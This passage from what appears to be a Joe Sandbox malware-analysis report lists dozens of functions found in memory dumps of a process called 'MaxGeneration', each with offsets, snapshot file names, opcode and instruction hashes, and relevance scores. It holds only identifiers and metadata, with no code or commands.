                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.1858884308.0000000003270000.00000040.00000800.00020000.00000000.sdmp, Offset: 03270000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_3270000_MaxGeneration.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: d676633436f0347749d3cab469ef1efa0752977cf144f75e800d7ec743c4f021
                                                                        • Instruction ID: 3789c72d0f6415f1b759bcbd55e19e4c2c09f2a0385b1343b30a5c4666295a35
                                                                        • Opcode Fuzzy Hash: d676633436f0347749d3cab469ef1efa0752977cf144f75e800d7ec743c4f021
                                                                        • Instruction Fuzzy Hash: A021F731A003059FCB24CF79C844A9EBBF5FF89250B244AADE48AD73A1DB30AD44CB50
                                                                        Function 019ED5DC Relevance: .1, Instructions: 75COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.1858130504.00000000019ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 019ED000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_19ed000_MaxGeneration.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: c2db5421c52546cf30ddde991dcd61fe5251d5f6afd81ca453fbbfe17140aa90
                                                                        • Instruction ID: 67004c28e587d5c54addddb56ab8b0ba4b20386c9bf9f30c1df7e762d43dd5e2
                                                                        • Opcode Fuzzy Hash: c2db5421c52546cf30ddde991dcd61fe5251d5f6afd81ca453fbbfe17140aa90
                                                                        • Instruction Fuzzy Hash: 2C210371504204EFDB06DF58D9C8F2ABFE6FB98714F20C569E90D0B256C336D456CAA2
                                                                        Function 05466780 Relevance: .1, Instructions: 75COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.1908785633.0000000005460000.00000040.00000800.00020000.00000000.sdmp, Offset: 05460000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_5460000_MaxGeneration.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 331888b887c2a405d263b64d11606074b7c57b463a3e844b94009f8d8b73f5d0
                                                                        • Instruction ID: a1d5b5acc182407108d85cf694a5a1dacfec646b6b717d2af4461b93a77ed82e
                                                                        • Opcode Fuzzy Hash: 331888b887c2a405d263b64d11606074b7c57b463a3e844b94009f8d8b73f5d0
                                                                        • Instruction Fuzzy Hash: 58217FB4D0410DDFDB04CFA9D8447EEBBF6FB89702F11846AD015A3384DB785A498B92
                                                                        Function 019FD05C Relevance: .1, Instructions: 74COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.1858272664.00000000019FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 019FD000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_19fd000_MaxGeneration.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 456222268f6131983962868d18ffdda8b52d93c87fb04bcc857093ba46fc58c9
                                                                        • Instruction ID: 171b4b73a81f01b548dac460e57a7e0727dd0fb1907188a0ed5cadec8eba04ae
                                                                        • Opcode Fuzzy Hash: 456222268f6131983962868d18ffdda8b52d93c87fb04bcc857093ba46fc58c9
                                                                        • Instruction Fuzzy Hash: F2212571204240EFDB15DF58D9C4F2ABFA9FB84314F24C56DEA090B256C336D44AC7A2
                                                                        Function 0546A309 Relevance: .1, Instructions: 71COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.1908785633.0000000005460000.00000040.00000800.00020000.00000000.sdmp, Offset: 05460000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_5460000_MaxGeneration.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: a24450cbed8a86f3b05caf5e5e3fdc55100837f3287e5164089989aebd0cdd0c
                                                                        • Instruction ID: 29d8a83a02fa0b0f05d5c5d00b3cbe5dedb1371c2681d0120fc7aa53fb05293c
                                                                        • Opcode Fuzzy Hash: a24450cbed8a86f3b05caf5e5e3fdc55100837f3287e5164089989aebd0cdd0c
                                                                        • Instruction Fuzzy Hash: 1B31CD70941609CFEB64CF9AD448BEDBBF2FB05301F1180AAE419AB650D3359989CF42
                                                                        Function 05466790 Relevance: .1, Instructions: 69COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.1908785633.0000000005460000.00000040.00000800.00020000.00000000.sdmp, Offset: 05460000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_5460000_MaxGeneration.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 5c5b988c7af6b84a9d4093e2a7d99c5828940f07f6543bbd3dddac77c74e46c9
                                                                        • Instruction ID: 809c924610b08c2b502074dfdaf0ca5133ed3d65ea1f773367aacdff4aa87981
                                                                        • Opcode Fuzzy Hash: 5c5b988c7af6b84a9d4093e2a7d99c5828940f07f6543bbd3dddac77c74e46c9
                                                                        • Instruction Fuzzy Hash: 24212A74D0420EDFDB04DFA9D4447EEBBF6FB89302F11846AD019A3344DB785A458B92
                                                                        Function 03270B8F Relevance: .1, Instructions: 69COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.1858884308.0000000003270000.00000040.00000800.00020000.00000000.sdmp, Offset: 03270000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_3270000_MaxGeneration.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: d9b6cbbce31c2c0de4d34916f5d99f0875d77fd55779339292d151bfe13266ec
                                                                        • Instruction ID: 268c3d3053016b3786078f88b94baef273f2906108d38c5143e1beb4d1df1aad
                                                                        • Opcode Fuzzy Hash: d9b6cbbce31c2c0de4d34916f5d99f0875d77fd55779339292d151bfe13266ec
                                                                        • Instruction Fuzzy Hash: 3021DE319142069FDB24DF68C844AEEBBF5EF48214F2484AEE446A3285DB309E89CB51
                                                                        Function 03271348 Relevance: .1, Instructions: 65COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.1858884308.0000000003270000.00000040.00000800.00020000.00000000.sdmp, Offset: 03270000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_3270000_MaxGeneration.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 55df93073e75696cfd6ffb6e4ab7dd51b91d3a810aca039d59ff78217f6c4fdc
                                                                        • Instruction ID: 398cbc3fb8d533f9f8b66029cab9500665cd2fac51532ea41250c42cd3f054e3
                                                                        • Opcode Fuzzy Hash: 55df93073e75696cfd6ffb6e4ab7dd51b91d3a810aca039d59ff78217f6c4fdc
                                                                        • Instruction Fuzzy Hash: BC21A474A002069FCB00DFB4D8988AEBBF1FF85301B1185A9D509EB3A5D730AE45CB51
                                                                        Function 0327DCF0 Relevance: .1, Instructions: 64COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.1858884308.0000000003270000.00000040.00000800.00020000.00000000.sdmp, Offset: 03270000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_3270000_MaxGeneration.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 4d39aa947b3953f2c8d0be29120279dda386d06bcc01d3cd0300504a6c9d2a6b
                                                                        • Instruction ID: 6db2a2f6eba61229820f7247c3aa4aa79a038f04d972ae6d3b4a2122705f3079
                                                                        • Opcode Fuzzy Hash: 4d39aa947b3953f2c8d0be29120279dda386d06bcc01d3cd0300504a6c9d2a6b
                                                                        • Instruction Fuzzy Hash: 3A2138B0D1520CEFDB40EFA8D1487AEBBF5FF49305F50A1A9D409A3245E7B86A84CB01
                                                                        Function 05466A00 Relevance: .1, Instructions: 61COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.1908785633.0000000005460000.00000040.00000800.00020000.00000000.sdmp, Offset: 05460000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_5460000_MaxGeneration.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 7311e7acf24d78b5be3e60577d763e153aef1f1c9ca0dd7ec4d7289191046b54
                                                                        • Instruction ID: 06cd146ff4b2778dbfc962f1a4177ec5437361129b8121bdea004c2e55f15fea
                                                                        • Opcode Fuzzy Hash: 7311e7acf24d78b5be3e60577d763e153aef1f1c9ca0dd7ec4d7289191046b54
                                                                        • Instruction Fuzzy Hash: 4F119678D05108DBD744CFA9D9417DDBBF6EB89300F24C1AAD809A7344DB319A46CB52
                                                                        Function 03270E81 Relevance: .1, Instructions: 60COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.1858884308.0000000003270000.00000040.00000800.00020000.00000000.sdmp, Offset: 03270000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_3270000_MaxGeneration.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 796442aac923b309049203024d874a55eebb436b6f847f77e1b02556a4924842
                                                                        • Instruction ID: 03f61faba415928283d63e470ddde72543d6c9f6b8a19765cd1a4fb98a47ba85
                                                                        • Opcode Fuzzy Hash: 796442aac923b309049203024d874a55eebb436b6f847f77e1b02556a4924842
                                                                        • Instruction Fuzzy Hash: 58211835A10619CFCB15DBA9C184A9CF7F2FB48314F09C0A9E819AB651D774EC85CF91
                                                                        Function 07F1A640 Relevance: .1, Instructions: 57COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.1916093355.0000000007F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 07F00000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_7f00000_MaxGeneration.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: c8ee3d1ad66e53f96cbb8be3602d7d2681cc4611103ffc534f3afa8023509f17
                                                                        • Instruction ID: b7c356dc8b6eaeec258f84df6bf224c557e485827bedb695934f40da5959160c
                                                                        • Opcode Fuzzy Hash: c8ee3d1ad66e53f96cbb8be3602d7d2681cc4611103ffc534f3afa8023509f17
                                                                        • Instruction Fuzzy Hash: E621A0B4E0120ACFDB04DFA8D5499EEBBF5EB48711F148469D81AB7350DB34A944CFA1
                                                                        Function 032709D3 Relevance: .1, Instructions: 57COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.1858884308.0000000003270000.00000040.00000800.00020000.00000000.sdmp, Offset: 03270000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_3270000_MaxGeneration.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: d51385845a60ae9ef09643533a61f01ee5a6a5b3387c6fc2c22c49c48a713815
                                                                        • Instruction ID: a2b854f87146cb2e9bc9cb86a0a82d156465b8974a16e451efa89d4ec986bfa8
                                                                        • Opcode Fuzzy Hash: d51385845a60ae9ef09643533a61f01ee5a6a5b3387c6fc2c22c49c48a713815
                                                                        • Instruction Fuzzy Hash: 6211F630A10209DFCB44DFA8C948AADBBF2FF48300F1584A9E909EB361D734E945CB90
                                                                        Function 019ED5D7 Relevance: .1, Instructions: 56COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.1858130504.00000000019ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 019ED000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_19ed000_MaxGeneration.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
                                                                        • Instruction ID: 751a85dbd57cdbe316c2faf74fb4c3c8fe88bcc2ec6432cfe8f38363fdef03f1
                                                                        • Opcode Fuzzy Hash: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
                                                                        • Instruction Fuzzy Hash: 1611DF76404240DFDB02CF44D5C8B16BFB2FB84314F24C2A9D8090B256C336D45ACBA2
                                                                        Function 019FD057 Relevance: .1, Instructions: 55COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.1858272664.00000000019FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 019FD000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_19fd000_MaxGeneration.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 8904e6e2034f6e8b723f427b0fac37b038faba2da46a35eb3e2bfe2bad4ef527
                                                                        • Instruction ID: f44510dc2e1e7fdad92518d4bfea1d8cf6787503ecb44f6d8f32287f1068a82a
                                                                        • Opcode Fuzzy Hash: 8904e6e2034f6e8b723f427b0fac37b038faba2da46a35eb3e2bfe2bad4ef527
                                                                        • Instruction Fuzzy Hash: 1B11D076504280DFDB16CF54D9C4B16BFB2FB84314F28C6ADD9090B656C33AD41ACBA2
                                                                        Function 05466968 Relevance: .1, Instructions: 54COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.1908785633.0000000005460000.00000040.00000800.00020000.00000000.sdmp, Offset: 05460000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_5460000_MaxGeneration.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: c2d04c9921d3f1ff45fb4a061a8d1933ac7409c88200ff4088fbb4485387f17d
                                                                        • Instruction ID: 9a8a7a26a6ee86edc43a565a8a164732c549e54f29ef4d95f7c816444398cc3a
                                                                        • Opcode Fuzzy Hash: c2d04c9921d3f1ff45fb4a061a8d1933ac7409c88200ff4088fbb4485387f17d
                                                                        • Instruction Fuzzy Hash: 231102B480928CEFC701DBA4C81079E7FB4EB06200F0491EBD8499B392DA349A05EB96
                                                                        Function 0546636D Relevance: .1, Instructions: 54COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.1908785633.0000000005460000.00000040.00000800.00020000.00000000.sdmp, Offset: 05460000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_5460000_MaxGeneration.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 972bca4d577a42a4916e524092d7f31d31a4a3d70ef9fc7603d93cf892eee8ce
                                                                        • Instruction ID: 1500d2835d4ce5eec484d12583b365fe6c69e6c14a8d997f28531562ae0b0f8e
                                                                        • Opcode Fuzzy Hash: 972bca4d577a42a4916e524092d7f31d31a4a3d70ef9fc7603d93cf892eee8ce
                                                                        • Instruction Fuzzy Hash: DB212670905148CFEB04CF99D2487EDBBF6FB4A301F26906AD006AB359D7789989CF01
                                                                        Function 054660FF Relevance: .1, Instructions: 52COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.1908785633.0000000005460000.00000040.00000800.00020000.00000000.sdmp, Offset: 05460000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_5460000_MaxGeneration.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 178b54ec445d5b878522879a8d8755fa4b3e62ac55a2a7dc2b62ace1664e5b2f
                                                                        • Instruction ID: 96a4ff457b73025515a7c9e01156f333a46ba0d1b4e4626785da9aa2d98c30c0
                                                                        • Opcode Fuzzy Hash: 178b54ec445d5b878522879a8d8755fa4b3e62ac55a2a7dc2b62ace1664e5b2f
                                                                        • Instruction Fuzzy Hash: 5B01E174909108DBDF04CF95E4807EDBBB7AB8A314F25E16AD80997252DB314946CB42
                                                                        Function 03271358 Relevance: .1, Instructions: 52COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.1858884308.0000000003270000.00000040.00000800.00020000.00000000.sdmp, Offset: 03270000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_3270000_MaxGeneration.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 233ffac7ac1fa684e065e584fbb8660daf0822bf64f8910742e700264d0379bc
                                                                        • Instruction ID: 3e057c55fbb0b8eb571a895f489feeb91381e5ae3cfe838efcde28b064ac7d27
                                                                        • Opcode Fuzzy Hash: 233ffac7ac1fa684e065e584fbb8660daf0822bf64f8910742e700264d0379bc
                                                                        • Instruction Fuzzy Hash: 51114274A0020A9FCB04EFA4D5589AEBBB2FF88301F518569D509A7354DB31AE05CF91
                                                                        Function 03271D59 Relevance: .1, Instructions: 51COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.1858884308.0000000003270000.00000040.00000800.00020000.00000000.sdmp, Offset: 03270000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_3270000_MaxGeneration.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: e21da0ccba557eda11c58af05b90bde412f0092a689bdf77b418fac04fc8059f
                                                                        • Instruction ID: f8822769964bfeee264dbacf69c080347f74e346e67c7143649470ff380c2fb8
                                                                        • Opcode Fuzzy Hash: e21da0ccba557eda11c58af05b90bde412f0092a689bdf77b418fac04fc8059f
                                                                        • Instruction Fuzzy Hash: 7B115A38B20105CFEB18DF98D469BAC7775FF04700F100069E506AB394C7B4AD948F41
                                                                        Function 05466920 Relevance: .0, Instructions: 50COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.1908785633.0000000005460000.00000040.00000800.00020000.00000000.sdmp, Offset: 05460000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_5460000_MaxGeneration.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 89fbb4f0016a645ecb4a5482e647697674709084329e049a266e33e0bd4cba82
                                                                        • Instruction ID: b25e20e2b77fde084140d5bd02baf6ea2a315f0209fea1cbadda5fb4b66a01fe
                                                                        • Opcode Fuzzy Hash: 89fbb4f0016a645ecb4a5482e647697674709084329e049a266e33e0bd4cba82
                                                                        • Instruction Fuzzy Hash: A501D2B4A4920CFBC700DFA4C8407DDBBB4EB44300F1491EAEC49AB380DA359A05EB92
                                                                        Function 03272140 Relevance: .0, Instructions: 50COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.1858884308.0000000003270000.00000040.00000800.00020000.00000000.sdmp, Offset: 03270000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_3270000_MaxGeneration.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 432a4f26fb249782892b6e0ad3106ec3b65c3cfa77afb7b2bf4c2184bca40a74
                                                                        • Instruction ID: 6e9012b0e10f8b8dee19a50f0b42c64bb65281cf0ce717dd050a2309b35fb733
                                                                        • Opcode Fuzzy Hash: 432a4f26fb249782892b6e0ad3106ec3b65c3cfa77afb7b2bf4c2184bca40a74
                                                                        • Instruction Fuzzy Hash: 9501F779724205EFC314D65DD844B2AB6D6FBC8721F140839E60EDB395CA70DC824391
                                                                        Function 03272131 Relevance: .0, Instructions: 49COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.1858884308.0000000003270000.00000040.00000800.00020000.00000000.sdmp, Offset: 03270000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_3270000_MaxGeneration.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 50739490f7b14144e93582506c2c62be8184dbc401df6636c16c37f5c618227d
                                                                        • Instruction ID: 17262ff88c7f2a34d90d0852656ec066756c1b3d6c8dfdc62d67843e389d6b79
                                                                        • Opcode Fuzzy Hash: 50739490f7b14144e93582506c2c62be8184dbc401df6636c16c37f5c618227d
                                                                        • Instruction Fuzzy Hash: 4A012438B24301EFC310D668C844B3E7AD6FF88B00F14483AE60ADB392CAB4CC828751
                                                                        Function 05468524 Relevance: .0, Instructions: 48COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.1908785633.0000000005460000.00000040.00000800.00020000.00000000.sdmp, Offset: 05460000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_5460000_MaxGeneration.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 1461cd5cd13acd7d3c489cc63232a9f7e1e0db6d67af231c752aca5e3889ec02
                                                                        • Instruction ID: 28a7942d52581dc1d484d593d9df5034a81f3c3148e8a02d8fd02e8dc48223cf
                                                                        • Opcode Fuzzy Hash: 1461cd5cd13acd7d3c489cc63232a9f7e1e0db6d67af231c752aca5e3889ec02
                                                                        • Instruction Fuzzy Hash: 3521EEB0904228CFDB60CF68C844BEABBB5BB49304F0081EAE409A7291D7769E85CF41
                                                                        Function 07F1F590 Relevance: .0, Instructions: 46COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.1916093355.0000000007F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 07F00000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_7f00000_MaxGeneration.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 7da98a0c558a1bf4938c5a497e87acb99cc57414df26c7733acbeea4660f4ba9
                                                                        • Instruction ID: 2e446e811e53b61c4456e64b9be2d92e155d11441aba4c73c0830d675e7fd061
                                                                        • Opcode Fuzzy Hash: 7da98a0c558a1bf4938c5a497e87acb99cc57414df26c7733acbeea4660f4ba9
                                                                        • Instruction Fuzzy Hash: 2511B3B0E0020EDFCB48DFA9D9456BEBBF5BF88300F10856A9518A7354DB319A418B91
                                                                        Function 019ED01D Relevance: .0, Instructions: 45COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.1858130504.00000000019ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 019ED000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_19ed000_MaxGeneration.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: bbed311a49540a4274f83ac7effadbcb93385067124ccfa49c987b8cffc567ff
                                                                        • Instruction ID: 0c4b610d6e8454f8bb95a93f8d73c47b837ccc2933be5f72c86f8e4facb288dd
                                                                        • Opcode Fuzzy Hash: bbed311a49540a4274f83ac7effadbcb93385067124ccfa49c987b8cffc567ff
                                                                        • Instruction Fuzzy Hash: 5A012B31109300AAE7124B69CD88B67BFDCEF413A6F0CC429ED0C4B186C279D841C6B1
                                                                        Function 019ED006 Relevance: .0, Instructions: 45COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.1858130504.00000000019ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 019ED000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_19ed000_MaxGeneration.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: cf5a56fbe0c0dd412277e7332e483e0a60d166e5bf901ec57dec6a6df5ce5a9f
                                                                        • Instruction ID: e349dcb8cab4c25756d54039279137d82c41bd43fbdc6850ce03a5332be9046a
                                                                        • Opcode Fuzzy Hash: cf5a56fbe0c0dd412277e7332e483e0a60d166e5bf901ec57dec6a6df5ce5a9f
                                                                        • Instruction Fuzzy Hash: F7011B6100E3C09ED7138B25C898652BFB8EF53225F19C1DBD9888F1A7C2695845C772
                                                                        Function 05464230 Relevance: .0, Instructions: 45COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.1908785633.0000000005460000.00000040.00000800.00020000.00000000.sdmp, Offset: 05460000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_5460000_MaxGeneration.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: ad1842f68695427619c89d8790bde998072fafd288341c6b041021522b444421
                                                                        • Instruction ID: 95673a69ef42cf9de4da2cfbd322693afe8a87d8ef2eafc3b7b93de4ed6c92e5
                                                                        • Opcode Fuzzy Hash: ad1842f68695427619c89d8790bde998072fafd288341c6b041021522b444421
                                                                        • Instruction Fuzzy Hash: AF11E3B4A05228AFEB64CF64C985BE9B7F6FB09701F1080EAD50DA7281D7759E85CF01
                                                                        Function 05466E4C Relevance: .0, Instructions: 42COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.1908785633.0000000005460000.00000040.00000800.00020000.00000000.sdmp, Offset: 05460000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_5460000_MaxGeneration.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 3c97c94504bcc539fbded9a09a81703ac10d01a1926c113e901397393bb6e18e
                                                                        • Instruction ID: d8cd8f5974efb59b48f9321214b4cb360fe8eef31ea48cf164f4f2cd11c9370e
                                                                        • Opcode Fuzzy Hash: 3c97c94504bcc539fbded9a09a81703ac10d01a1926c113e901397393bb6e18e
                                                                        • Instruction Fuzzy Hash: 3211F574905208DFDB20DFA8D594BADBBF2FB4A301F2281AAD405A7341D7346D41CF42
                                                                        Function 03271CDB Relevance: .0, Instructions: 40COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.1858884308.0000000003270000.00000040.00000800.00020000.00000000.sdmp, Offset: 03270000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_3270000_MaxGeneration.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 167fcab9b59ecd100ec4692bdaafcdc25f8812b7c05ebcd9d101a71a7c7e2251
                                                                        • Instruction ID: f3ea385cda1890f4c16ffc3563831850d71514fbf71a3f1e846d00d9c99640d8
                                                                        • Opcode Fuzzy Hash: 167fcab9b59ecd100ec4692bdaafcdc25f8812b7c05ebcd9d101a71a7c7e2251
                                                                        • Instruction Fuzzy Hash: 4E011674610206CFC718CFA5C959BADBBB6BF49704F140469E802DB2A5DBB4A841CF00
                                                                        Function 05469509 Relevance: .0, Instructions: 39COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.1908785633.0000000005460000.00000040.00000800.00020000.00000000.sdmp, Offset: 05460000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_5460000_MaxGeneration.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 35bb0bb4873bf5606962831ddafdf4f64214090a180e03ccfe17a319684dbc21
                                                                        • Instruction ID: 2f80a250234daa2a346cea64888d0fc5fc880895065c0da618e772b5531e861a
                                                                        • Opcode Fuzzy Hash: 35bb0bb4873bf5606962831ddafdf4f64214090a180e03ccfe17a319684dbc21
                                                                        • Instruction Fuzzy Hash: 04016D3680020EEBCF00DF94D801AEEBB75FF48320F00C219E95873241D735A666DBA0
                                                                        Function 03270B0F Relevance: .0, Instructions: 38COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.1858884308.0000000003270000.00000040.00000800.00020000.00000000.sdmp, Offset: 03270000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
